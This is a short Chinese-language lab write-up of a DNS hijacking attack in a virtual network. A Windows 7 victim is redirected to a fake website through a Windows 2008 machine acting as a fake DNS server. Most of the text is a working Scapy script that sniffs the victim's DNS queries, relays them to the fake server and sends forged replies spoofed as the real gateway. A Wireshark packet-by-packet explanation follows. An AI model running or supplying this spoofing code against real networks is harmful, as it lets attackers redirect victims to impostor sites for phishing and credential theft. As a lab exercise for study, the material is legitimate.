实验环境:
搭建一个目标网站www.wh.com
网卡:192.168.146.2
Win7 (被欺骗的)IP:192.168.146.129
Win2008 (假DNS服务器) IP:192.168.146.130
1、网站搭建
Win2008网卡
2、执行py代码
from scapy.all import *
wlan2="VMware Virtual Ethernet Adapter for VMnet8"
dns_server="192.168.146.130" # win2008已搭好的dns服务器
dnsdst=""
def rev(p):
global dnsdst
try:
pip=p[IP]
pudp=[UDP]
pdns=p[DNS]
if p.dport==53 and pip.dst=="192.168.146.2":# 这个包是win7向网关的请求包
dnsdst=pip.src
send(IP(src="192.168.146.1",dst=dns_server,ttl=55)/UDP(sport=p[UDP].sport,dport=53)/pdns,iface=wlan2)
print("转发查询信息成功",dnsdst)
elif p.sport==53 and pip.src==dns_server: #这一个包是搭建的DNS给自己回的包
#print(dnsdst)
send(IP(src="192.168.146.2",dst="192.168.146.129",ttl=55)/UDP(sport=53,dport=p[UDP].dport)/pdns,iface=wlan2)
print("转发响应信息成功")
except :
pass
print("开始攻击")
sniff(iface=wlan2,filter="udp port 53",timeout=300,prn=rev)
成功劫持
注:
我们用wireshark抓包分析 (vmware8网卡)
1(请求包): win7向真实网关发送解析域名请求
2(请求包): 我们模拟客户端向win2008发送请求包
3(响应包): win2008将搭建的网站IP返回给我们
4(响应包): 我们伪装成真实网关192.168.146.2向win7回应 给它假的IP
5(响应包): 真实网关向win7返回查到的真实IP